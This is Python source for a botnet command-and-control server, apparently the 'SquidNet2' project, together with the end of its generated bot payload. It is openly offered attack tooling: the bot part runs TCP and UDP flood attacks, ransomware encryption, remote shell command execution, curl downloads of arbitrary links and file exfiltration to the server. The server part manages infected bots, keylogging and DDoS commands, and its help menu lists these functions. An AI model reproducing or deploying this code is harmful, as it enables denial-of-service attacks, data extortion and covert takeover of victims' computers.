pass try: self.udpflood.Stop_Atk() except: pass elif msg.startswith("!tcpflood"): msg_split = msg.split() ip = msg_split[1] try: port = int(msg_split[2]) except: port = 80 try: delay = float(msg_split[3]) except: delay = 0 try: pkt_size = int(msg_split[4]) except: pkt_size = 1024 self.tcpflood = TCP_UDP_Flood(ip, port, delay, pkt_size) self.tcp_flood = threading.Thread(target=self.tcpflood.TCP_Flood) self.tcp_flood.start() elif msg.startswith("!udpflood"): msg_split = msg.split() ip = msg_split[1] try: port = int(msg_split[2]) except: port = 80 try: delay = float(msg_split[3]) except: delay = 0 try: pkt_size = int(msg_split[4]) except: pkt_size = 1024 self.udpflood = TCP_UDP_Flood(ip, port, delay, pkt_size) self.udp_flood = threading.Thread(target=self.udpflood.UDP_Flood) self.udp_flood.start() elif msg.startswith("!getcwd"): cwd = os.getcwd() self.client.send(f"Current working directory: {os.getcwd()}".encode()) elif msg.startswith("!changedir"): newdir = self.return_actual_dir(self.get_filename(msg)) os.chdir(newdir) elif msg.startswith("!viewfilecontent"): file = msg.split()[1] self.client.send(open(file, "rb").read()) elif msg.startswith("!listdir"): self.client.send(f"Files in dir {os.getcwd()}: {os.listdir()}".encode()) elif msg.startswith("!mkdir"): dir = self.get_filename(msg) os.mkdir(dir) elif msg.startswith("!ransomware"): if not self.files_encrypted: self.ransomware = RansomWare(self.enc_key) self.ransomware.encrypt() self.files_encrypted = True elif msg.startswith("!createfile"): file = self.get_filename(msg) if file in os.listdir(): file += f"{random.randint(0,123456789)}" fileopened = open(file, "w") fileopened.close() elif msg.startswith("!delfile"): file = self.get_filename(msg) os.remove(file) self.client.send(f"File {file} has been deleted.".encode()) elif msg.startswith("!delfolder"): folder = self.get_filename(msg) shutil.rmtree(folder) self.client.send(f"Folder {folder} has been deleted.".encode()) elif msg.startswith("!writefile"): file = self.get_filename(msg) self.writefile = open(file, "rb") content = self.writefile.read() self.writefile.close() self.writefile = self.writefile.name self.writing_mode = True elif msg.startswith("!encfile"): if self.can_encrypt: file = self.get_filename(msg) fileopened = open(file,"rb") content = self.fernet.encrypt(fileopened.read()) fileopened.close() fileopened = open(file, "wb") fileopened.write(content) fileopened.close() self.client.send(f"File {file} has been encrypted.".encode()) else: self.client.send("Cannot encrypt files due to cryptography not being installed.".encode()) elif msg.startswith("!decrypt"): if self.can_encrypt: file = self.get_filename(msg) fileopened = open(file,"rb") try: content = self.fernet.decrypt(fileopened.read()) fileopened.close() fileopened = open(file, "wb") fileopened.write(content) fileopened.close() self.client.send(f"File {file} has been decrypted.".encode()) except Exception as e: self.client.send(f"There was en error with decrypting file {file}.".encode()) else: self.client.send("Cannot decrypt files due to cryptography not being installed.".encode()) elif msg.startswith("!filedownload"): try: file = self.get_filename(msg) file = open(file, "rb") self.sendingfile = True while True: sendto = file.read(10240) if not sendto: time.sleep(3) self.client.send("!stopsave".encode()) self.sendingfile = False break else: self.client.send(sendto) time.sleep(1) self.client.send("File transfer to server completed.".encode()) except: self.client.send("File was not found in the bot directory.".encode()) time.sleep(3) self.client.send("!stopsave".encode()) elif msg.startswith("!download"): try: link = msg.split()[1] file = msg.split()[2] cmd = subprocess.Popen(f"curl -o {file} {link}", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) self.client.send(f"File {file} has been downloaded from {link}.".encode()) except: self.client.send(f"There was an error with downloading the file.".encode()) else: cmd = subprocess.Popen(msg, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) self.client.send(cmd.stdout.read()) self.client.send(cmd.stderr.read()) except Exception as e: pass elif self.writing_mode: write_msg = f"\\n{msg}".encode() if msg == "!stopwrite": self.writing_mode = False else: file = open(self.writefile, "rb") content = file.read() file.close() file = open(self.writefile,"wb") file.write(content) file.write(write_msg) elif self.sql_connected: if msg.startswith("!stopsql"): self.sql_connected = False self.client.send("Disconnecting from the Sqlite3 Database file.".encode()) else: try: output = self.exec_sql_cmd(self.sql_file, msg) self.client.send(output.encode()) except Exception as e: self.client.send(f"There was an error in the Database file: {e}".encode()) bot = Bot('"""+self.external_ip+"""',"""+str(self.external_port)+""", """+str(self.enc_key)+""") bot.initiate_connection() """ return payload class AutoUpdate: def __init__(self): self.version = 4.0 def check_update(self): print(BotNet.logo(None)) print("[+] Checking for updates.....") version = self.version - 1.0 updated = False try: req = urllib.request.Request(url="https://raw.githubusercontent.com/DrSquidX/SquidNet2/main/SquidNet2Version.json") recv = urllib.request.urlopen(req).read().decode() version_info = open("SquidNet2Version.json","w") version_info.write(recv) version_info.close() json_info = json.load(open(version_info.name,"r")) version = float(json_info[0]["SquidNet2"]) except: print("[+] There was an error with checking updates, starting SquidNet2.") if version > self.version: print(f"[+] Your Version of SquidNet2 is outdated. You have version {self.version}, whereas the current update is version v{version}.") update = input("\n[+] Do you wish to update?(y/n): ").lower() if update == "y" or update == "yes": print(f"[+] Updating SquidNet2 to v{version}") updated = True req = urllib.request.Request(url="https://raw.githubusercontent.com/DrSquidX/SquidNet2/main/MainScripts/SquidNet2.py") resp = urllib.request.urlopen(req).read() file = open(sys.argv[0],"wb") file.write(resp) file.close() else: print("[+] Choosing not to update.") if not updated: if sys.platform == "win32": os.system("cls") else: os.system("clear") Squidnet = Config(self.version) Squidnet.read_config() else: print("[+] Restart the Script to have the Update be effective!") class Config: """Class needed for using the config file.""" def __init__(self, version): self.version = version self.config_file = "server.config" def read_config(self): """The config file is read here, where the variables that are in the file are used for the main server.""" try: file = open(self.config_file,"r") content = file.readlines() for i in content: if i.startswith("\nhostip") or i.startswith("hostip"): hostip = i.replace("=","").split()[1] elif i.startswith("\nhostport") or i.startswith("hostport"): hostport = int(i.replace("=","").split()[1]) elif i.startswith("\nexternal_host") or i.startswith("external_host"): external_host = i.replace("=","").split()[1] elif i.startswith("\nexternal_port") or i.startswith("external_port"): external_port = int(i.replace("=","").split()[1]) elif i.startswith("\nlogfile") or i.startswith("logfile"): logfile = i.replace("=","").split()[1] elif i.startswith("\nadmin_name") or i.startswith("admin_name"): admin_name = i.replace("=","").split()[1] elif i.startswith("\nadmin_password") or i.startswith("admin_password"): admin_password = i.replace("=","").split()[1] elif i.startswith("\nenc_key") or i.startswith("enc_key"): enc_key = f"{i.replace("=","").split()[1]}=".encode() elif i.startswith("\nftp_dir") or i.startswith("ftp_dir"): ftp_dir = i.replace("=","").split()[1] elif i.startswith("\nransomware_active") or i.startswith("ransomware_active"): ransomware_active = i.replace("=","").split()[1] if ransomware_active.lower() == "f": ransomware_active = False else: ransomware_active = True Squidnet = BotNet(hostip, hostport, self.version, external_host, external_port, admin_name, admin_password, logfile, enc_key, ftp_dir, ransomware_active) Squidnet.start() except Exception as e: self.gen_config_file() def gen_config_file(self): """If there is an error in the usage of the config file, a new config file will be generated, and the user can simply restart the script to have a functional server.""" print(BotNet.logo(None)) print("[+] There is an error in the config file. Re-writing and re-formatting to be able to be used by the server.") gen_content = """ hostip = localhost hostport = 8080 external_host = localhost external_port = 8080 logfile = log.txt admin_name = admin admin_password = adminpassword12345 enc_key = iC0g4NM4xy5JrIbRV-8cZSVgFfQioUX8eTVGYRhWlF8= ftp_dir = Bot_Files ransomware_active = f """ file = open(self.config_file,"w") file.write(gen_content) file.close() print("[+] The Config file has been reformatted and is now usable by the server! Restart the script to start the server.") item = AutoUpdate() item.check_update()
import socket, threading, hashlib, os, datetime, time, sqlite3, shutil, urllib.request, json, sys class BotNet: """Main Class for the BotNet. Every single line of server code, payload code is inside of this class. There are many functions inside of the class, where they have many different uses. They vary in usefullness and effectiveness, nonetheless they all contribute to the overall functioning of the server. It uses a lot of logic and similar code from DatCord, which was a server that truly displayed my advancements in network programming, where it also is an improvement from the previous SquidNet. SquidNet2 does not have as many bugs, and also not as many useless functions. This script remains unfinished(I worked on it a lot on an airplane DX), so there could be many problems that could possibly occur.""" def logo(self): """Logo of the script, nothing too special here.""" logo = """ /\\ //\\\\ //__\\\\ //____\\\\ \\\____// \\\__// [|__|] [|__|] [|__|] [|__|] [|__|] [|__|] [|__|] /) [|__|] (\\ //\_________[|__|]________/\\\\ ))__________||__||_________(( <_/ [ \/ ] \_> || || || || || || || || || || || || || || || || || || _________ .__ .||_||_||__ __ ________ _____ _______ / _____/ ________ __|__| __|||/\ \ _____/ |_\_____ \ ___ __/ | | \ _ \ \_____ \ / ____/ | \ |/ __ | / | \_/ __ \ __\/ ____/ \ \/ / | |_ / /_\ \ / < <_| | | / / /_/ |/ | \ ___/| | / \ \ / ^ / \ \_/ \\ /_______ /\__ |____/|__\____ |\____|__ /\___ >__| \_______ \ \_/\____ | /\ \_____ / \/ |__| \/ || || \/ \/ \/ |__| \/ \/ || || || || || || || || || || || || || || || || || || \\\ || // \\\||// \\\// ____-\/-____ -__- / \\ Advanced Botnet By DrSquid [+] Github: https://github.com/DrSquidX""" return logo def __init__(self, ip, port, version, external_ip=None, external_port=None, admin_user="admin", admin_pass="adminpassword12345", logfile="log.txt", enc_key=b'iC0g4NM4xy5JrIbRV-8cZSVgFfQioUX8eTVGYRhWlF8=', ftp_dir="Bot_Files", ransomware_active=True): """Initiation of the class. Most of every important variable is mentioned here. This function is very important, as it has the definitions of all of the important variables needed for functionality, and also for specification of different things. Many things are defined here, such as the socket that will be used to handle all of the connections, as well as all of the smaller, yet very important variables that would hinder the performace and functionality of the script, if they were to be missing. There is also the use of some functions, as they are needed to help configure different things inside of the server.""" self.ip = ip self.port = int(port) self.downloading = False self.ddosing = False self.enc_key = enc_key self.botdownload = None self.ftp_dir = ftp_dir self.ransomware_active = ransomware_active self.external_ip = external_ip self.external_port = external_port self.admin_online = False self.logfile = logfile self.sqlfilename = "Server.db" self.filetransfer = False self.sqlconnected = False self.sending_file = False self.auto_ban = False self.keylogging = False self.botinfofile = "botinfo.txt" self.timetoautoban = 0 botinfo = open(self.botinfofile,"w").close() self.max_connpersec = 20 self.connpersec = 0 self.conncount = 0 self.timer = 1 self.conf_dbfile() file = open(self.logfile, "w").close() self.log(self.logo()) self.version = version if self.external_ip is None: self.external_ip = self.ip if self.external_port is None: self.external_port = self.port if self.ransomware_active: self.quot = "" else: self.quot = "'''" self.payload = self.gen_payload() self.payloadfile = open("SquidBot.py","w") self.payloadfile.write(self.payload) self.payloadfile.close() if self.ftp_dir not in os.listdir(): os.mkdir(self.ftp_dir) self.log(f"""[({datetime.datetime.today()})][(INFO)]: Server Started on {self.ip}:{self.port} [({datetime.datetime.today()})][(INFO)]: Bots/Admins will connect to: {self.external_ip}:{self.external_port} [({datetime.datetime.today()})][(INFO)]: Payload Bot Script Generated in {os.path.join(os.getcwd(), "SquidBot.py")}""") self.botnum = 1 self.connlist = [] self.botinfo = [] self.adminconn = None self.focusing = False self.focus_conn = None self.focus_botname = "" self.admin_username = admin_user self.admin_password = hashlib.sha256(admin_pass.encode()).hexdigest() self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) shutil.copyfile(os.path.join(os.getcwd(),self.payloadfile.name), os.path.join(os.getcwd(),self.ftp_dir,self.payloadfile.name)) self.log(f"[({datetime.datetime.today()})][(SERVER)]: Payload file has been transferred to the FTP directory(for extraction of Admin).") def exec_sql_cmd(self, file, cmd): """Optimization code made for executing commands on db files. The reason it was made was for optimization purposes. This excerpt of code would be pretty much all over the place in this script if it weren't a function, and it would make the script look less elegant and clean with all of the repitition.""" output = "" try: db = sqlite3.connect(file) cursor = db.cursor() cursor.execute(cmd) output = cursor.fetchall() db.commit() cursor.close() db.close() except Exception as e: self.log(f"[({datetime.datetime.today()})][(RESETSQL)]: Error with SQL Database file '{self.sqlfilename}': {e}, reconfiguring as a precaution.") self.conf_dbfile() return output def conf_dbfile(self): """This function helps configure the database file that contains the IP whitelists and banlists. As you can see, there is the previous function that was used to optimize the code. What the function truly does, is create the Database file if it doesn't already exist, and create the tables containing the IP banlist and whitelist if they do not exist.""" try: file = open(self.sqlfilename,"rb") except: file = open(self.sqlfilename,"wb") file.close() self.exec_sql_cmd(self.sqlfilename, "create table if not exists ipbanlist(ip)") self.exec_sql_cmd(self.sqlfilename, "create table if not exists ipallowlist(ip)") def return_iplist(self, list_type): """This gets a list of the IPs, although you need to specify whether it is from the IP Whitelist or the Banlist.""" banned_ips = self.exec_sql_cmd(self.sqlfilename, f"select ip from ip{list_type}list") new_ip_list = [] for i in banned_ips: new_ip_list.append(i[0]) return new_ip_list def add_ip(self, ip, list_type): """This adds an IP to the specified list type(either Whitelist or Banlist)""" self.exec_sql_cmd(self.sqlfilename, f"insert into ip{list_type}list values('{ip}')") def remove_ip(self, ip, list_type): """This removes an IP to the specified list type(either Whitelist or Banlist)""" self.exec_sql_cmd(self.sqlfilename, f"delete from ip{list_type}list where ip = '{ip}'") def help_msg(self): """The help message sent to the admins if they request it. It contains all of the information about the commands, and also the commands themselves. The arguements are provided, so that the user can get a sense of how to actually use the commands effectively.""" return """\n[(SERVER)]: Info about each command: [+] Utilities: [+] !whitelistip <ip> - Adds an IP to the whitelist, allowing them to connect to the server during a DDoS Attack. [+] !unwhitelistip <ip> - Removes an IP from the whitelist. [+] !banip <ip> - Bans an IP from the server, therefore having them kicked every time they try to connect to the server. [+] !unbanip <ip> - Removes an IP from the server. [+] !focusconn <botname> - Only be able to send or see messages from a single bot. [+] !stopfocus - Stops focus mode. [+] !getipwhitelist - Obtains the list of the IP Addresses in the Whitelist. [+] !getipbanlist - Obtains the list of the IP Addresses in the Banlist. [+] !getbotinfo - Displays information from each of the bots. [+] !help - Displays this message. [+] !startftp - Start file transfer protocol between the admin and the server(to get any transferred Bot Files). [+] !togglelisten - Toggles the setting for the server to listen for connections or not. [+] Bot Commands: [+] !filedownload <file> - Download a file on a single bot computer(requires focus mode). [+] !download <file> <link> - Make the bot download a file from the internet. [+] !mkdir <dir> - Create a folder inside of the bots working directory. [+] !delfolder <dir> - Remove a folder inside of the bots working directory. [+] !createfile <filename> - Create a file in the bots. [+] !delfile <filename> - Delete a file in the bots. [+] !encfile <filename> - Encrypt a file inside of the bots. [+] !decrypt <filename> - Decrypt a file that has been encrypted. [+] !open <filename> - Open a file inside of the bots working directory. [+] !viewfilecontent <file> - View the contents of a file in the bots directory. [+] !writefile <filename> - Open and write inside of a file inside of the bots. [+] !sqlconnect <sqlfile> - Connect to a Sqlite3 Compatable Database file in the bots. [+] !changedir <dir> - Changes the bots working directory to the one specified(use '%user%' as the user for multiple bots). [+] !stopsql - Disconnect from the connected Database file. [+] !stopwrite - Close writing mode and return to normal. [+] !getcwd - Get the current directory of the bots. [+] !keylog - Activate keylogging to see the bots keystrokes. [+] !stopkeylog - Stops the keylogging. [+] !listdir - List all of the items in the bots working directory. [+] !ransomware - Activates the ransomware program inside of the bots. [+] DDoS Attack Commands: [+] !httpflood <website> <delay> - Make the bots conduct an HTTP Flood Attack on the specified Website. [+] !tcpflood <ip> <port> <delay> <pkt_size> - Make the bots concuct a TCP Flood Attack on the specified IP and Port. [+] !udpflood <ip> <port> <delay> <pkt_size> - Make the bots concuct a UDP Flood Attack on the specified IP and Port. [+] !stopatk - Stops the current DDoS Attack that is happening(only one can happen at a time). [+] Note: Any other instructions will be run as shell commands on the remote computers.""" def file_tranfer_help_msg(self): """If the user decides to go onto FTP mode, they will be able to extract files that were extracted from the server via the connected bots. This is the help message sent to the user, if they request help. Like the previous help message, it has all the commands and the information and parameters about them, for the user to use these commands effectively.""" return """\n[(SERVER)]: Info about each command in FTP Mode. [+] !help - Displays this message. [+] !fileinfo - Displays all of the files inside of Server's directory. [+] !download [filename] - Downloads a specified file inside of the Server's directory. [+] !listdir - Gets all of the files inside of the Server's directory. [+] !stopftp - Return to the Botnet and controlling the bots. [+] Note: You will be unable to send messages to the bots in FTP Mode. You can return to normal by inputting '!stopftp'. """ def start(self): """This function is vital for the functionality of the server, because it actually starts it! It simply tries to bind the server to the IP and Port that were provided in the config file. If it doesn't work, an error message will be displayed, so that the user can get a sense of the problem.""" working = False try: self.server.bind((self.ip, self.port)) working = True except Exception as e: self.log(f"[({datetime.datetime.today()})][(ERROR)]: There was an error with binding the server: {e}. Try to change some of the variables in the Config files if needed.") if working: self.listener = threading.Thread(target=self.listen).start() def conn_persec_timer(self): """Function used for the not-so-perfect Anti-DDoS System. It measure the connections per second, and decides whether to take action against them(by that I mean banning them).""" while True: time.sleep(1) self.timer += 1 if self.connpersec >= self.max_connpersec: self.connpersec = self.max_connpersec + 5 if self.max_connpersec <= self.connpersec: self.timetoautoban += 1 if not self.auto_ban and self.timetoautoban >= 2: self.log(f"[({datetime.datetime.today()})][(ANTI_DDOS)]: Setting 'self.auto_ban' variable to: True") self.auto_ban = True else: if self.auto_ban: self.log(f"[({datetime.datetime.today()})][(ANTI_DDOS)]: Setting 'self.auto_ban' variable to: False") self.auto_ban = False self.timetoautoban = 0 if self.timer >= 60: self.timer = 1 self.connpersec = 1 self.conncount = 0 try: self.connpersec = self.conncount / self.timer except: pass def config_conn_vars(self): """Optimization code made for less repitition.""" self.connpersec = self.conncount / self.timer if self.connpersec >= self.max_connpersec: self.connpersec = self.max_connpersec + 5 self.conncount += 1 if self.max_connpersec <= self.connpersec: if not self.auto_ban and self.timetoautoban >= 2: self.log(f"[({datetime.datetime.today()})][(ANTI_DDOS)]: Setting 'self.auto_ban' variable to: True") self.auto_ban = True else: if self.auto_ban: self.log(f"[({datetime.datetime.today()})][(ANTI_DDOS)]: Setting 'self.auto_ban' variable to: False") self.auto_ban = False self.timetoautoban = 0 def listen(self): """A very important function for the server. It listens to all of the connections, if it is able to, as the 'self.listening' variable can be toggled on and off, making the server unable to listen for connections. It also has some of the Anti-DDoS code, where it also closes any connections inside of the banlist, and allows connections in the whitelist into the server without any interruption.""" self.log(f'[({datetime.datetime.today()})][(LISTEN)]: Server is listening.....') self.listening = True connpersectimer = threading.Thread(target=self.conn_persec_timer) connpersectimer.start() while True: if self.listening: try: self.server.listen() conn, ip = self.server.accept() if self.connpersec >= self.max_connpersec: self.connpersec = self.max_connpersec + 5 if self.listening: kicked = False if ip[0] in self.return_iplist("ban"): conn.close() kicked = True else: if self.auto_ban: if ip[0] in self.return_iplist("allow"): self.config_conn_vars() else: self.log(f"[({datetime.datetime.today()})][(BANNING_IP)]: {ip[0]} attempted to join the server during the DDoS Attack, banning as a precaution.") self.add_ip(ip[0],"ban") conn.close() kicked = True else: self.config_conn_vars() if not kicked: conn.send(f"SquidNet Server v{self.version}".encode()) handler = threading.Thread(target=self.handle, args=(conn, ip)) handler.start() else: conn.close() except Exception as e: self.log(f"[({datetime.datetime.today()})][(ERROR)]: There was an error with listening for connections: {e}") def obtain_botname_list(self): botnames = [] for i in self.botinfo: botnames.append(i[0]) return botnames def parse_info_msg(self, infomsg, conn, srcport): """There is a message sent by every client to the server, which would contain information about them. This include their hostname, IP Address, User, and Operating System. This is mainly for the bots, so that the admin would have a sense of the computer they have take control of. It returns a list of all of the information, to be used later.""" try: name = f"{infomsg.split()[1]}{self.botnum}" except: name = f"Bot{self.botnum}" self.botnum += 1 try: ip = infomsg.split()[2] except: ip = "127.0.0.1" try: osuser = infomsg.split()[3] except: osuser = "Unknown" try: os = infomsg.split()[4] except: os = "Unknown" self.botnum += 1 ogcontent = open(self.botinfofile,"r") content = ogcontent.read() file = open(self.botinfofile,"w") file.write(content) file.write(f"\n[+] Botname: {name}\n[+] IP: {ip}\n[+] Src Port: {srcport}\n[+] User: {osuser}\n[+] OS: {os}\n[+] Conn: {conn}\n") file.close() return [name, ip, srcport, osuser, os, conn] def get_filename(self, msg): """When there is a file trying to be provided for file transfering(etc), there might be files with names with spaces in them. This is a problem with my old system of file name obtaining, as the filenames with spaces would only have the first word of the file used to create or do something with said file. This function fixes that problem, by returning the actual name of the file.""" msg = msg.split() del msg[0] filename = "" for i in msg: filename += f" {i}" return filename.strip() def log(self, logitem, display=True): """Important function, needed for logging. This is so that the Server Owner can see what happened in the server, in case of a crash or bug that needed to be fixed. This helps, as all of the output in the server is the same as the output in the log file. The server owner would be able to see any bugs or issues, or easily anything that happened in the server at all. However, the log file is wiped everytime the server restarts(I can easily change that, you can contact me if you want that to happen).""" content = "" if display: print(logitem) try: file = open(self.logfile, "r") content = file.read() file.close() except Exception as e: print(f"[({datetime.datetime.today()})][(RESETLOG)]: Error with Log file '{self.logfile}': {e}, reconfiguring as a precaution.") content = f"""{self.logo()}\n[({datetime.datetime.today()})][(RESETLOG)]: Error with Log file '{self.logfile}': {e}, reconfiguring as a precaution.""" file = open(self.logfile,"w") file.write(content+"\n"+logitem) file.close() def send_to_other(self, sender, reciever, msg, recieverconn, send_raw=False): """Code for optimizing sending and logging at the same time. It logs the message that is being sent, and it also sends the message to the connection that the sender its trying to send to.""" item = f"[({datetime.datetime.today()})][({sender})--->({reciever})]: {msg}" self.log(item) if not send_raw: recieverconn.send(f"\n[({sender})]: {msg}".encode()) else: recieverconn.send(msg.encode()) def send_file(self, filename, conn): """Function needed for FTP. It sends all of the bytes of the file being transferred to the specified connection, which in this case it will be the server admin due to the function only being used in the transferring of files from the server to the server admin.""" self.sending_file = True file = open(filename, "rb") time.sleep(2) while True: sendto = file.read(10240) if not sendto: time.sleep(2) conn.send("!stopsave".encode()) break else: conn.send(sendto) time.sleep(5) self.send_to_other("SERVER",self.admin_username,"File Transfer completed.", conn) def handle(self, conn, ip): """Very important function, needed for handling the connections of the clients. The way a bot is recognized is quite simple really. There are many variables that help with the process. The handler first uses the information packet(the one with all of the client information), to see if the bot is a bot or a fake bot. If the information packet is invalid(if it does not start with '!botreg'), the connection will be simply closed. If the packet is valid, the Bot will have the ability to become an admin(if they have the correct credentials). If they are not an admin, they cannot do anything to take control of the server, but simply be able to send messages around to the admin and server. If the Bot is trying to be an admin, they can send an authentication message(in this case its '!login') followed by the credentials. These credentials are not displayed on the log. For authentication to happen. The username is checked with the server variable to see if they match. If they do, now the passwords need to match. There is password hashing in the server(sha256 hashing algorithm), for further security and to prevent any breaches. The password provided would be hashed into sha256, to see if it matches with the hashed password that the server has. It these all match, access is granted to the admin, where they can now do whatever they want with the bots, whether good or bad. There are many things to do with the assortment of commands that are provided.""" bot = False name = ip admin = False registered = False while True: try: display_single_msg = True msg_from_bot = conn.recv(10240) try: msg = str(msg_from_bot.decode()).strip() except: msg = str(msg) if msg.strip() != "": if not bot: info_packet = msg if not info_packet.startswith("!botreg"): conn.close() break else: self.connlist.append(conn) info = self.parse_info_msg(msg, conn, ip[1]) self.botinfo.append(info) name = info[0] ipaddr = info[2] if ipaddr in self.return_iplist("ban"): conn.close() break registered = True original_name = name self.log(f"[({datetime.datetime.today()})][(BOTJOIN)]: Bot {name} has joined the botnet.") try: self.adminconn.send(f"\n[(SERVER)]: Bot {name} has joined the botnet.".encode()) except: pass bot = True elif bot: if not admin: if msg.startswith("!login"): if not self.admin_online: try: username = msg.split()[1] password = msg.split()[2] if username == self.admin_username and hashlib.sha256(password.encode()).hexdigest() == self.admin_password: self.log(f"[({datetime.datetime.today()})][(INFO)]: A new admin session has been created.") name = self.admin_username admin = True self.adminconn = conn self.admin_online = True self.send_to_other("SERVER",name,"Successfully logged into the Botnet. You have access to all of the bots.", conn) self.send_to_other("SERVER",name,"Input '!help' if you need more info on the commands.", conn) for i in self.botinfo: if i[0] == original_name: self.botinfo.remove(i) break else: self.send_to_other("SERVER",name,"Authentication Failed.", conn) except: pass else: self.send_to_other("SERVER",name,"There is already an active owner session. Please wait until they log off.", conn) elif msg.startswith("!key") and self.keylogging: keystroke = msg.split()[1] keyfile = open(name+".txt","r") content = keyfile.read() keyfile.close() newkeyfile = open(name+".txt","w") newkeyfile.write(content) newkeyfile.write(f"\n[+] {keystroke}") newkeyfile.close() else: try: display_single_msg = False if not self.focusing: display_single_msg = True else: if conn == self.focus_conn: if not self.downloading: self.send_to_other(name, self.admin_username,msg, self.adminconn) else: try: if msg == "!stopsave": self.downloading = False self.botdownload.close() elif msg == "!fileerror": self.downloading = False self.botdownload.close() os.remove(self.botdownload.name) self.send_to_other("SERVER",self.admin_username,"There was an error with downloading the bot's file. Cancelling the download.") else: self.botdownload.write(msg_from_bot) except Exception as e: self.botdownload.write(msg_from_bot) except: display_single_msg = True elif admin: if not self.filetransfer: if msg.startswith("!help"): self.log(f"[({datetime.datetime.today()})][(SERVER)--->({self.admin_username})]: Sent the help message.") self.adminconn.send(self.help_msg().encode()) elif msg.startswith("!startftp"): self.send_to_other("SERVER",name, "Activiting FTP mode. You will be able to get files inside of the servers directory(for ex downloaded bot Files).", conn) self.send_to_other("SERVER",name, "You can input '!help' in case you need to know what commands are there for you.", conn) self.filetransfer = True elif msg.startswith("!focusconn"): try: botname = msg.split()[1] found = False for i in self.botinfo: if i[0] == botname: self.focus_conn = i[len(i)-1] found = True if found: self.send_to_other("SERVER",name,f"You can now only see output from bot {botname}.", conn) self.focus_botname = botname self.focusing = True except: self.send_to_other("SERVER",name,"Invalid input! Here is the valid input: !focusconn <botname>", conn) elif msg.startswith("!banip"): try: banned_ip = msg.split()[1] if banned_ip in self.return_iplist("allow"): self.send_to_other("SERVER",name,f"The IP Address specified is in the whitelist! Unwhitelist it to ban it.", conn) elif banned_ip in self.return_iplist("ban"): self.send_to_other("SERVER",name,f"The IP Address specified is already in the banlist!", conn) else: self.add_ip(banned_ip, "ban") self.send_to_other("SERVER",name,f"IP Address '{banned_ip}' has been banned from the server.", conn) except: self.send_to_other("SERVER",name,f"Invalid input! Here is the valid input: !banip <ip>", conn) elif msg.startswith("!unbanip"): try: unbanning_ip = msg.split()[1] if unbanning_ip not in self.return_iplist("ban"): self.send_to_other("SERVER",name,f"The IP Address specified is not in the banlist!", conn) else: self.remove_ip(unbanning_ip,"ban") self.send_to_other("SERVER",name,f"IP Address '{unbanning_ip}' has been unbanned from the server.", conn) except: self.send_to_other("SERVER",name,f"Invalid input! Here is the valid input: !unbanip <ip>", conn) elif msg.startswith("!getipbanlist"): self.send_to_other("SERVER",name,f"IP Ban List: {self.return_iplist('ban')}", conn) elif msg.startswith("!getipwhitelist"): self.send_to_other("SERVER",name,f"IP White List: {self.return_iplist('allow')}", conn) elif msg.startswith("!whitelistip"): try: whitelist_ip = msg.split()[1] if whitelist_ip in self.return_iplist("allow"): self.send_to_other("SERVER",name,f"The IP Address specified is already in the whitelist!", conn) elif whitelist_ip in self.return_iplist("ban"): self.send_to_other("SERVER",name,f"The IP Address specified is in the banlist!", conn) else: self.add_ip(whitelist_ip, "allow") self.send_to_other("SERVER",name,f"IP Address '{whitelist_ip}' has been whitelisted in the server.", conn) except: self.send_to_other("SERVER",name,f"Invalid input! Here is the valid input: !whitelistip <ip>", conn) elif msg.startswith("!unwhitelistip"): try: unwhitelist_ip = msg.split()[1] if unwhitelist_ip not in self.return_iplist("allow"): self.send_to_other("SERVER",name,f"The IP Address specified is not in the whitelist!", conn) else: self.remove_ip(unwhitelist_ip,"allow") self.send_to_other("SERVER",name,f"IP Address '{unwhitelist_ip}' has been unwhitelisted from the server.", conn) except: self.send_to_other("SERVER",name,f"Invalid input! Here is the valid input: !unwhitelistip <ip>", conn) elif msg.startswith("!togglelisten"): if self.listening == True: self.listening = False elif self.listening == False: self.listening = True self.log(f"[({datetime.datetime.today()})][(INFO)]: Listening for connections has been set to: {self.listening}") self.adminconn.send(f"\n[(SERVER)]: Listening for connections has been set to: {self.listening}".encode()) elif msg.startswith("!stopfocus"): if not self.focusing: self.send_to_other("SERVER",name,"You are not focusing on a bot right now!", conn) else: self.focusing = False self.focus_conn = None self.send_to_other("SERVER",name,f"Stopped focusing on bot {self.focus_botname}.", conn) self.focus_botname = "" elif msg.startswith("!getbotinfo"): if len(self.botinfo) == 0: self.send_to_other("SERVER",name, "There are no bots connected to the Botnet at the moment.", conn) for bot in self.botinfo: if "closed" in str(bot[5]): self.botinfo.remove(bot) else: self.send_to_other("SERVER",name,f"Info on Bot {bot[0]} - IP: {bot[1]} Src-Port: {bot[2]} User: {bot[3]} OS: {bot[4]} Conn: {bot[5]}", self.adminconn) elif msg.startswith("!filedownload"): try: filename = self.get_filename(msg) if self.downloading: self.send_to_other("SERVER",name,"You are already downloading a file from the bot computer!", conn) else: if self.focusing: self.botdownload = open(os.path.join(os.getcwd(),f"{self.ftp_dir}/{filename}"),"wb") self.downloading = True self.send_to_other(self.admin_username,self.focus_botname,msg, self.focus_conn, True) self.send_to_other("SERVER",name,f"Attempting to download file {filename} from {self.focus_botname}. You will not be able to send instructions to any of the bots until the download finishes!", conn) else: self.send_to_other("SERVER",name,"You need to be in focus mode to be able to download files from bots(there would be a lot of traffic going on in the server)!", conn) except: self.send_to_other("SERVER",name,"Invalid input! Here is the valid input: !filedownload <filename>", conn) else: if msg.startswith("!stopatk"): if self.ddosing: if not self.focusing: self.ddosing = False self.send_to_other("SERVER",self.admin_username,"Attempting to stop all DDoS Attacks in the botnet.",self.adminconn) else: self.send_to_other("SERVER",self.admin_username,"You are in focus mode! Only the bot you are focusing will stop attacking!",self.adminconn) elif not self.ddosing: self.send_to_other("SERVER",self.admin_username,"The Bots are currently not attacking any domain.",self.adminconn) elif msg.startswith("!keylog"): self.send_to_other("SERVER",self.admin_username,"Activating Keylogger script on the bots(All of the logged keystrokes will be in a txt file with the bot's name).",self.adminconn) self.keylogging = True botnames = self.obtain_botname_list() for i in botnames: try: keylogfile = open(f"{i}.txt","r") except: keylogfile = open(f"{i}.txt","w") keylogfile.write(f"\nLOGGED KEYSTROKES FOR BOT {i}\n") keylogfile.close() elif msg.startswith("!stopkeylog"): self.keylogging = False self.send_to_other("SERVER",self.admin_username,"Deactivating Keylogger script on the bots.",self.adminconn) elif msg.startswith("!ransomware"): if self.ransomware_active: if self.focusing: self.send_to_other("SERVER",name,"Only the bot in focus mode has had the ransomware program activated!", conn) else: self.send_to_other("SERVER",name,"Ransomware programs are activating!", 